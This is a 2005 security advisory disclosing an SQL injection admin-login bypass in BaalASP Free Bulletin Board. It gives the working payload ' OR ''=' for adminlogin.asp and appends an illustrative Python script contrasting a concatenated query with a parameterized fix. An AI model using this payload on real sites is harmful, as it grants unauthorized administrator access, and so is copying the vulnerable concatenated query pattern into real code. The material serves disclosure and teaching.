------------------------------------------------------
Nightmare TeAmZ Advisory 002
------------------------------------------------------

Date - 10/2005

BaalASP Free Bulletin Board SQL Injection Admin Login

AFFECTED PRODUCTS
=================
BaalASP Free Bulletin Board
http://baalasp.com/index.shtml

OVERVIEW
========
BaalASP is a simple, easy-to-install discussion forum (bulletin board) which supports either an Access backend or MySQL. Installation is easy and only takes a few moments, with no programming knowledge required. It supports users, publishers and administrators.

DETAILS
=======
1. SQL Injection

An unauthenticated attacker may log in as admin on the vulnerable site.

POC
===
1. ------ SQL Injection: Example --------

WWW.[Host]/[BaalASP]/adminlogin.asp
User: ' OR ''='
Pass: ' OR ''='

SOLUTION:
=========
1. Vendor contacted
2. Vendor ignored the mail.
3. Exploit released

Credits
=======
This vulnerability was discovered and researched by BiPi_HaCk of Nightmare TeAmZ
Site: http://www.NightmareTeAmZ.altervista.org
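As an added illustration (not code from the advisory or from BaalASP, whose login page is classic ASP), the following Python script models the admin login check against an in-memory SQLite table: a query built by string concatenation accepts the ' OR ''=' payload shown above, while the same check with bound parameters rejects it. The table, column names and credentials are constructed assumptions.

```python
import sqlite3

# Constructed stand-in for a board's user table; not BaalASP's real schema.
def setup_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, is_admin INTEGER)")
    conn.execute("INSERT INTO users VALUES ('admin', 's3cret-placeholder', 1)")
    conn.commit()
    return conn

def login_vulnerable(conn, user, pw):
    # Query assembled by concatenation (hypothetical reconstruction of the
    # flawed pattern). With user = pw = ' OR ''=' the WHERE clause becomes
    #   username = '' OR ''='' AND password = '' OR ''='' AND is_admin = 1
    # and AND binds tighter than OR, so the last OR branch (''='' AND is_admin = 1)
    # matches the admin row regardless of the real credentials.
    sql = ("SELECT COUNT(*) FROM users WHERE username = '" + user +
           "' AND password = '" + pw + "' AND is_admin = 1")
    return conn.execute(sql).fetchone()[0] > 0

def login_fixed(conn, user, pw):
    # Same check with bound parameters: the input is compared as a literal
    # string value and can never change the SQL structure.
    sql = ("SELECT COUNT(*) FROM users WHERE username = ? AND password = ? "
           "AND is_admin = 1")
    return conn.execute(sql, (user, pw)).fetchone()[0] > 0

# The payload from the advisory, used here only to confirm the two behaviours.
PAYLOAD = "' OR ''='"

if __name__ == "__main__":
    db = setup_db()
    print("concatenated query accepts payload:", login_vulnerable(db, PAYLOAD, PAYLOAD))
    print("parameterized query accepts payload:", login_fixed(db, PAYLOAD, PAYLOAD))
```

In classic ASP the equivalent of login_fixed is an ADODB.Command with parameters created via CreateParameter instead of a concatenated SQL string; a web application firewall or request log filter matching quote-plus-OR patterns on adminlogin.asp is a useful detection but not a substitute for that fix.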